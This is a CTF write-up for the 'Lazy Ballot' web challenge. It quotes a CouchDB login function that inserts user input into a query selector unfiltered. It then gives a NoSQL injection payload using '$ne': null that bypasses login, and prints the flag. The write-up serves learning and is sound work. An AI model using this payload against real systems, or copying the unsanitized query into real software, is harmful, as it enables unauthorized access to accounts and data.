daffainfo
/
ctf-writeup
mirror of https://github.com/daffainfo/ctf-writeup.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
ctf-writeup/Business CTF 2023 The Great.../Lazy Ballot
History
Muhammad Daffa c3f0b94ff3 feat: added AmateursCTF 2023 2023-07-20 08:02:45 +07:00
..
images feat: added Business CTF 2023: The Great Escape 2023-07-17 12:34:29 +07:00
README.md feat: added AmateursCTF 2023 2023-07-20 08:02:45 +07:00
web_lazy_ballot.zip feat: added Business CTF 2023: The Great Escape 2023-07-17 12:34:29 +07:00

README.md

Lazy Ballot

As a Zenium State hacker, your mission is to breach Arodor's secure election system, subtly manipulating the results to create political chaos and destabilize their government, ultimately giving Zenium State an advantage in the global power struggle.

About the Challenge

We have been given a source code (You can download the source code here) and also we got a website to test. Here is the preview of the website

preview

And also there is a login page

prevew_login

The flag was located in the database, especially in the votes database and we need to login first to obtain the flag

flag_location

How to Solve?

If you check this code in database.js file

async loginUser(username, password) {
    const options = {
        selector: {
            username: username,
            password: password,
        },
    };

    const resp = await this.userdb.find(options);
    if (resp.docs.length) return true;

    return false;
    }

As you can see there is no filter in the code so we can bypass it using this payload

{"username": {"$ne": null}, "password": {"$ne": null} }

bypass

And then find the flag in the voting list

flag

HTB{c0rrupt3d_c0uch_b4ll0t}